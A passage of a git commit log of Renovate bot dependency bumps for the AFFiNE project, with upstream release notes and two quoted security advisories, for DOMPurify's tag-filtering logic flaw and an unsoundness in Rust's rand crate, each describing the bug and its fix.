([39193ca](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/39193cac4124eedc9e8fa5ae16ba960b5ab7a36b)) ##### Dependencies - The following workspace dependencies were updated - dependencies - [@​opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common) bumped from ^0.38.2 to ^0.38.3 - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.61.0 to ^0.62.0 ### [`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0620-2026-03-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450)) ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.60.0 to ^0.61.0 </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-nestjs-core)</summary> ### [`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0610-2026-04-17) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479)) ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8)) ### [`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0600-2026-03-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450)) ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-socket.io)</summary> ### [`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0620-2026-04-17) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479)) ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.61.0 to ^0.62.0 ### [`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0610-2026-03-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450)) ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.60.0 to ^0.61.0 </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjEyMy44IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
f7d0f1d5ae |
chore: bump up Node.js to v22.22.2 (#14836)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [node](https://nodejs.org) ([source](https://redirect.github.com/nodejs/node)) | patch | `22.22.1` → `22.22.2` | --- ### Release Notes <details> <summary>nodejs/node (node)</summary> ### [`v22.22.2`](https://redirect.github.com/nodejs/node/compare/v22.22.1...v22.22.2) [Compare Source](https://redirect.github.com/nodejs/node/compare/v22.22.1...v22.22.2) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjEyMy44IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
0849b342fa |
chore: bump up dompurify version to v3.4.0 [SECURITY] (#14833)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.3.3` → `3.4.0`](https://renovatebot.com/diffs/npm/dompurify/3.3.3/3.4.0) |  |  | ### GitHub Vulnerability Alerts #### [GHSA-39q2-94rc-95cp](https://redirect.github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp) ## Summary In `src/purify.ts:1117-1123`, `ADD_TAGS` as a function (via `EXTRA_ELEMENT_HANDLING.tagCheck`) bypasses `FORBID_TAGS` due to short-circuit evaluation. The condition: ``` !(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName]) ``` When `tagCheck(tagName)` returns `true`, the entire condition is `false` and the element is kept — `FORBID_TAGS[tagName]` is never evaluated. ## Inconsistency This contradicts the attribute-side pattern at line 1214 where `FORBID_ATTR` explicitly wins first: ``` if (FORBID_ATTR[lcName]) { continue; } ``` For tags, FORBID should also take precedence over ADD. ## Impact Applications using both `ADD_TAGS` as a function and `FORBID_TAGS` simultaneously get unexpected behavior — forbidden tags are allowed through. Config-dependent but a genuine logic inconsistency. ## Suggested Fix Check `FORBID_TAGS` before `tagCheck`: ``` if (FORBID_TAGS[tagName]) { /* remove */ } else if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ } ``` ## Affected Version v3.3.3 (commit 883ac15) ##### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N` --- ### Release Notes <details> <summary>cure53/DOMPurify (dompurify)</summary> ### [`v3.4.0`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.4.0): DOMPurify 3.4.0 [Compare Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.3...3.4.0) **Most relevant changes:** - Fixed a problem with `FORBID_TAGS` not winning over `ADD_TAGS`, thanks [@​kodareef5](https://redirect.github.com/kodareef5) - Fixed several minor problems and typos regarding MathML attributes, thanks [@​DavidOliver](https://redirect.github.com/DavidOliver) - Fixed `ADD_ATTR`/`ADD_TAGS` function leaking into subsequent array-based calls, thanks [@​1Jesper1](https://redirect.github.com/1Jesper1) - Fixed a missing `SAFE_FOR_TEMPLATES` scrub in `RETURN_DOM` path, thanks [@​bencalif](https://redirect.github.com/bencalif) - Fixed a prototype pollution via `CUSTOM_ELEMENT_HANDLING`, thanks [@​trace37labs](https://redirect.github.com/trace37labs) - Fixed an issue with `ADD_TAGS` function form bypassing `FORBID_TAGS`, thanks [@​eddieran](https://redirect.github.com/eddieran) - Fixed an issue with `ADD_ATTR` predicates skipping URI validation, thanks [@​christos-eth](https://redirect.github.com/christos-eth) - Fixed an issue with `USE_PROFILES` prototype pollution, thanks [@​christos-eth](https://redirect.github.com/christos-eth) - Fixed an issue leading to possible mXSS via Re-Contextualization, thanks [@​researchatfluidattacks](https://redirect.github.com/researchatfluidattacks) and others - Fixed a problem with the type dentition patcher after Node version bump - Fixed freezing BS runs by reducing the tested browsers array - Bumped several dependencies where possible - Added needed files for OpenSSF scorecard checks **Published Advisories are here:** <https://github.com/cure53/DOMPurify/security/advisories?state=published> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjAuMiIsInVwZGF0ZWRJblZlciI6IjQzLjEyMC4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
dc3b95c886 |
chore: bump up Rust crate rand to v0.9.3 [SECURITY] (#14832)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [rand](https://rust-random.github.io/book) ([source](https://redirect.github.com/rust-random/rand)) | dependencies | patch | `0.9.1` → `0.9.3` | | [rand](https://rust-random.github.io/book) ([source](https://redirect.github.com/rust-random/rand)) | workspace.dependencies | patch | `0.9.2` → `0.9.3` | ### GitHub Vulnerability Alerts #### [GHSA-cq8v-f236-94qc](https://redirect.github.com/rust-random/rand/pull/1763) It has been reported (by @​lopopolo) that the `rand` library is [unsound](https://rust-lang.github.io/unsafe-code-guidelines/glossary.html#soundness-of-code--of-a-library) (i.e. that safe code using the public API can cause Undefined Behaviour) when all the following conditions are met: - The `log` and `thread_rng` features are enabled - A [custom logger](https://docs.rs/log/latest/log/#implementing-a-logger) is defined - The custom logger accesses `rand::rng()` (previously `rand::thread_rng()`) and calls any `TryRng` (previously `RngCore`) methods on `ThreadRng` - The `ThreadRng` (attempts to) reseed while called from the custom logger (this happens every 64 kB of generated data) - Trace-level logging is enabled or warn-level logging is enabled and the random source (the `getrandom` crate) is unable to provide a new seed `TryRng` (previously `RngCore`) methods for `ThreadRng` use `unsafe` code to cast `*mut BlockRng<ReseedingCore>` to `&mut BlockRng<ReseedingCore>`. When all the above conditions are met this results in an aliased mutable reference, violating the Stacked Borrows rules. Miri is able to detect this violation in sample code. Since construction of [aliased mutable references is Undefined Behaviour](https://doc.rust-lang.org/stable/nomicon/references.html), the behaviour of optimized builds is hard to predict. Affected versions of `rand` are `>= 0.7, < 0.9.3` and `0.10.0`. ##### Severity Low --- ### Release Notes <details> <summary>rust-random/rand (rand)</summary> ### [`v0.9.3`](https://redirect.github.com/rust-random/rand/compare/0.9.2...0.9.3) [Compare Source](https://redirect.github.com/rust-random/rand/compare/0.9.2...0.9.3) ### [`v0.9.2`](https://redirect.github.com/rust-random/rand/blob/HEAD/CHANGELOG.md#092---2025-07-20) [Compare Source](https://redirect.github.com/rust-random/rand/compare/0.9.1...0.9.2) ##### Deprecated - Deprecate `rand::rngs::mock` module and `StepRng` generator ([#​1634](https://redirect.github.com/rust-random/rand/issues/1634)) ##### Additions - Enable `WeightedIndex<usize>` (de)serialization ([#​1646](https://redirect.github.com/rust-random/rand/issues/1646)) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjAuMiIsInVwZGF0ZWRJblZlciI6IjQzLjEyMC4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
b0251c93cb |
chore: bump up rustc version to v1.94.0 (#14701)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [rustc](https://redirect.github.com/rust-lang/rust) | minor | `1.93.1` → `1.94.0` | --- ### Release Notes <details> <summary>rust-lang/rust (rustc)</summary> ### [`v1.94.0`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1940-2026-03-05) [Compare Source](https://redirect.github.com/rust-lang/rust/compare/1.93.1...1.94.0) \========================== <a id="1.94.0-Language"></a> ## Language - [Impls and impl items inherit `dead_code` lint level of the corresponding traits and trait items](https://redirect.github.com/rust-lang/rust/pull/144113) - [Stabilize additional 29 RISC-V target features including large portions of the RVA22U64 / RVA23U64 profiles](https://redirect.github.com/rust-lang/rust/pull/145948) - [Add warn-by-default `unused_visibilities` lint for visibility on `const _` declarations](https://redirect.github.com/rust-lang/rust/pull/147136) - [Update to Unicode 17](https://redirect.github.com/rust-lang/rust/pull/148321) - [Avoid incorrect lifetime errors for closures](https://redirect.github.com/rust-lang/rust/pull/148329) <a id="1.94.0-Platform-Support"></a> ## Platform Support - [Add `riscv64im-unknown-none-elf` as a tier 3 target](https://redirect.github.com/rust-lang/rust/pull/148790) Refer to Rust's [platform support page][platform-support-doc] for more information on Rust's tiered platform support. [platform-support-doc]: https://doc.rust-lang.org/rustc/platform-support.html <a id="1.94.0-Libraries"></a> ## Libraries - [Relax `T: Ord` bound for some `BinaryHeap<T>` methods.](https://redirect.github.com/rust-lang/rust/pull/149408) <a id="1.94.0-Stabilized-APIs"></a> ## Stabilized APIs - [`<[T]>::array_windows`](https://doc.rust-lang.org/stable/std/primitive.slice.html#method.array_windows) - [`<[T]>::element_offset`](https://doc.rust-lang.org/stable/std/primitive.slice.html#method.element_offset) - [`LazyCell::get`](https://doc.rust-lang.org/stable/std/cell/struct.LazyCell.html#method.get) - [`LazyCell::get_mut`](https://doc.rust-lang.org/stable/std/cell/struct.LazyCell.html#method.get_mut) - [`LazyCell::force_mut`](https://doc.rust-lang.org/stable/std/cell/struct.LazyCell.html#method.force_mut) - [`LazyLock::get`](https://doc.rust-lang.org/stable/std/sync/struct.LazyLock.html#method.get) - [`LazyLock::get_mut`](https://doc.rust-lang.org/stable/std/sync/struct.LazyLock.html#method.get_mut) - [`LazyLock::force_mut`](https://doc.rust-lang.org/stable/std/sync/struct.LazyLock.html#method.force_mut) - [`impl TryFrom<char> for usize`](https://doc.rust-lang.org/stable/std/convert/trait.TryFrom.html#impl-TryFrom%3Cchar%3E-for-usize) - [`std::iter::Peekable::next_if_map`](https://doc.rust-lang.org/stable/std/iter/struct.Peekable.html#method.next_if_map) - [`std::iter::Peekable::next_if_map_mut`](https://doc.rust-lang.org/stable/std/iter/struct.Peekable.html#method.next_if_map_mut) - [x86 `avx512fp16` intrinsics](https://redirect.github.com/rust-lang/rust/issues/127213) (excluding those that depend directly on the unstable `f16` type) - [AArch64 NEON fp16 intrinsics](https://redirect.github.com/rust-lang/rust/issues/136306) (excluding those that depend directly on the unstable `f16` type) - [`f32::consts::EULER_GAMMA`](https://doc.rust-lang.org/stable/std/f32/consts/constant.EULER_GAMMA.html) - [`f64::consts::EULER_GAMMA`](https://doc.rust-lang.org/stable/std/f64/consts/constant.EULER_GAMMA.html) - [`f32::consts::GOLDEN_RATIO`](https://doc.rust-lang.org/stable/std/f32/consts/constant.GOLDEN_RATIO.html) - [`f64::consts::GOLDEN_RATIO`](https://doc.rust-lang.org/stable/std/f64/consts/constant.GOLDEN_RATIO.html) These previously stable APIs are now stable in const contexts: - [`f32::mul_add`](https://doc.rust-lang.org/stable/std/primitive.f32.html#method.mul_add) - [`f64::mul_add`](https://doc.rust-lang.org/stable/std/primitive.f64.html#method.mul_add) <a id="1.94.0-Cargo"></a> ## Cargo - Stabilize the config include key. The top-level include config key allows loading additional config files, enabling better organization, sharing, and management of Cargo configurations across projects and environments. [docs](https://doc.rust-lang.org/nightly/cargo/reference/config.html#including-extra-configuration-files) [#​16284](https://redirect.github.com/rust-lang/cargo/pull/16284) - Stabilize the pubtime field in registry index. This records when a crate version was published and enables time-based dependency resolution in the future. Note that crates.io will gradually backfill existing packages when a new version is published. Not all crates have pubtime yet. [#​16369](https://redirect.github.com/rust-lang/cargo/pull/16369) [#​16372](https://redirect.github.com/rust-lang/cargo/pull/16372) - Cargo now parses [TOML v1.1](https://toml.io/en/v1.1.0) for manifests and configuration files. Note that using these features in Cargo.toml will raise your development MSRV, but the published manifest remains compatible with older parsers. [#​16415](https://redirect.github.com/rust-lang/cargo/pull/16415) - [Make `CARGO_BIN_EXE_<crate>` available at runtime ](https://redirect.github.com/rust-lang/cargo/pull/16421/) <a id="1.94.0-Compatibility-Notes"></a> ## Compatibility Notes - [Forbid freely casting lifetime bounds of `dyn`-types](https://redirect.github.com/rust-lang/rust/pull/136776) - [Make closure capturing have consistent and correct behaviour around patterns](https://redirect.github.com/rust-lang/rust/pull/138961) Some finer details of how precise closure captures get affected by pattern matching have been changed. In some cases, this can cause a non-move closure that was previously capturing an entire variable by move, to now capture only part of that variable by move, and other parts by borrow. This can cause the borrow checker to complain where it previously didn't, or cause `Drop` to run at a different point in time. - [Standard library macros are now imported via prelude, not via injected `#[macro_use]`](https://redirect.github.com/rust-lang/rust/pull/139493) This will raise an error if macros of the same name are glob imported. For example if a crate defines their own `matches` macro and then glob imports that, it's now ambiguous whether the custom or standard library `matches` is meant and an explicit import of the name is required to resolve the ambiguity. One exception is `core::panic` and `std::panic`, if their import is ambiguous a new warning ([`ambiguous_panic_imports`](https://redirect.github.com/rust-lang/rust/issues/147319)) is raised. This may raise a new warning ([`ambiguous_panic_imports`](https://redirect.github.com/rust-lang/rust/issues/147319)) on `#![no_std]` code glob importing the std crate. Both `core::panic!` and `std::panic!` are then in scope and which is used is ambiguous. - [Don't strip shebang in expression-context `include!(…)`s](https://redirect.github.com/rust-lang/rust/pull/146377) This can cause previously working includes to no longer compile if they included files which started with a shebang. - [Ambiguous glob reexports are now also visible cross-crate](https://redirect.github.com/rust-lang/rust/pull/147984) This unifies behavior between local and cross-crate errors on these exports, which may introduce new ambiguity errors. - [Don't normalize where-clauses before checking well-formedness](https://redirect.github.com/rust-lang/rust/pull/148477) - [Introduce a future compatibility warning on codegen attributes on body-free trait methods](https://redirect.github.com/rust-lang/rust/pull/148756) These attributes currently have no effect in this position. - [On Windows `std::time::SystemTime::checked_sub_duration` will return `None` for times before the Windows epoch (1/1/1601)](https://redirect.github.com/rust-lang/rust/pull/148825) - [Lifetime identifiers such as `'a` are now NFC normalized](https://redirect.github.com/rust-lang/rust/pull/149192). - [Overhaul filename handling for cross-compiler consistency](https://redirect.github.com/rust-lang/rust/pull/149709) Any paths emitted by compiler now always respect the relative-ness of the paths and `--remap-path-prefix` given originally. One side-effect of this change is that paths emitted for local crates in Cargo (path dependencies and workspace members) are no longer absolute but relative when emitted as part of a diagnostic in a downstream crate. <a id="1.94.0-Internal-Changes"></a> ## Internal Changes These changes do not affect any public interfaces of Rust, but they represent significant improvements to the performance or internals of rustc and related tools. - [Switch to `annotate-snippets` for error emission](https://redirect.github.com/rust-lang/rust/pull/150032) This should preserve mostly the same outputs in rustc error messages. </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
8ba02ed6fb |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.66.0" (#14699)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.60.0"` → `from: "5.66.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.66.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.65.0...5.66.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.65.0...5.66.0) ### [`v5.65.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5650) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.64.0...5.65.0) #### 5.65.0 ### [`v5.64.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5640) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.63.0...5.64.0) #### 5.64.0 ### [`v5.63.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5630) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.62.0...5.63.0) #### 5.63.0 ### [`v5.62.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5620) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.61.0...5.62.0) #### 5.62.0 ### [`v5.61.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5610) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.60.0...5.61.0) #### 5.61.0 </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
ffa3ff9d7f |
chore: bump up apple/swift-collections version to from: "1.4.1" (#14697)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | patch | `from: "1.4.0"` → `from: "1.4.1"` | --- ### Release Notes <details> <summary>apple/swift-collections (apple/swift-collections)</summary> ### [`v1.4.1`](https://redirect.github.com/apple/swift-collections/releases/tag/1.4.1): Swift Collections 1.4.1 [Compare Source](https://redirect.github.com/apple/swift-collections/compare/1.4.0...1.4.1) This patch release is mostly focusing on evolving the package traits `UnstableContainersPreview` and `UnstableHashedContainers`, with the following notable fixes and improvements to the stable parts of the package: - Make the package documentation build successfully on the DocC that ships in Swift 6.2. - Avoid using floating point arithmetic to size collection storage in the `DequeModule` and `OrderedCollections` modules. #### Changes to experimental package traits The new set and dictionary types enabled by the `UnstableHashedContainers` trait have now resolved several correctness issues in their implementation of insertions. They have also gained some low-hanging performance optimizations. Like before, these types are in "working prototype" phase, and while they have working implementations of basic primitive operations, we haven't done much work validating their performance yet. Feedback from intrepid early adopters would be very welcome. The `UnstableContainersPreview` trait has gained several new protocols and algorithm implementations, working towards one possible working model of a coherent, ownership-aware container/iteration model. - [`BidirectionalContainer`][BidirectionalContainer] defines a container that allows iterating over spans backwards, and provides decrement operations on indices -- an analogue of the classic `BidirectionalCollection` protocol. - [`RandomAccessContainer`][RandomAccessContainer] models containers that allow constant-time repositioning of their indices, like `RandomAccessCollection`. - [`MutableContainer`][MutableContainer] is the ownership-aware analogue of `MutableCollection` -- it models a container type that allows its elements to be arbitrarily reordered and mutated/reassigned without changing the shape of the data structure (that is to say, without invalidating any indices). - [`PermutableContainer`][PermutableContainer] is an experimental new spinoff of `MutableContainer`, focusing on reordering items without allowing arbitrary mutations. - [`RangeReplaceableContainer`][RangeReplaceableContainer] is a partial, ownership-aware analogue of `RangeReplaceableCollection`, providing a full set of insertion/append/removal/consumption operations, with support for fixed-capacity conforming types. - [`DynamicContainer`][DynamicContainer] rounds out the range-replacement operations with initializer and capacity reservation requirements that can only be implemented by dynamically sized containers. [BidirectionalContainer]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/BidirectionalContainer.swift [RandomAccessContainer]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/RandomAccessContainer.swift [MutableContainer]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/MutableContainer.swift [PermutableContainer]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/PermutableContainer.swift [RangeReplaceableContainer]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/RangeReplaceableContainer.swift [DynamicContainer]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/DynamicContainer.swift - We now have [working reference implementations](https://redirect.github.com/apple/swift-collections/tree/main/Sources/ContainersPreview/Protocols) of lazy `map`, `reduce` and `filter` operations on borrowing iterators, producers and drains, as well a `collect(into:)` family of methods to supply "greedy" variants, generating items into a container of the user's choice. Importantly, the algorithms tend to be defined on the iterator types, rather than directly on some sequence/container -- going this way has some interesting benefits (explicitness, no confusion between the various flavors or the existing `Sequence` algorithms), but they also have notable drawbacks (minor design issues with the borrowing iterator protocol, unknowns on how the pattern would apply to container algorithms, etc.). ```swift let items: RigidArray<Int> = ... let transformed = items.makeBorrowingIterator() // obviously we'd want a better name here, like `borrow()` .map { 2 * $0 } .collect(into: UniqueArray.self) // `transformed` is a UniqueArray instance holding all values in `items`, doubled up ``` ```swift let items: RigidArray = ... let transformed = items.makeBorrowingIterator() .filter { !$0.isMultiple(of: 7) } .copy() .collect(into: UniqueArray.self) // `transformed` holds a copy of all values in `items` that aren't a multiple of 7 ``` ```swift let items: RigidArray = ... let transformed = items.consumeAll() .filter { !$0.isMultiple(of: 7) } .collect(into: UniqueArray.self) // `transformed` holds all values that were previously in `items` that aren't a multiple of 7. `items` is now empty. ``` Like before, these are highly experimental, and they will definitely change in dramatic/radical ways on the way to stabilization. Note that there is no project- or team-wide consensus on any of these constructs. I'm publishing them primarily as a crucial reference point, and to gain a level of shared understanding of the actual problems that need to be resolved, and the consequences of the design path we are on. #### What's Changed - Add some decorative badges in the README by [@​lorentey](https://redirect.github.com/lorentey) in [#​591](https://redirect.github.com/apple/swift-collections/pull/591) - \[Dequemodule, OrderedCollections] Avoid using floating point arithmetic by [@​lorentey](https://redirect.github.com/lorentey) in [#​592](https://redirect.github.com/apple/swift-collections/pull/592) - Enforce dress code for license headers by [@​lorentey](https://redirect.github.com/lorentey) in [#​593](https://redirect.github.com/apple/swift-collections/pull/593) - Bump 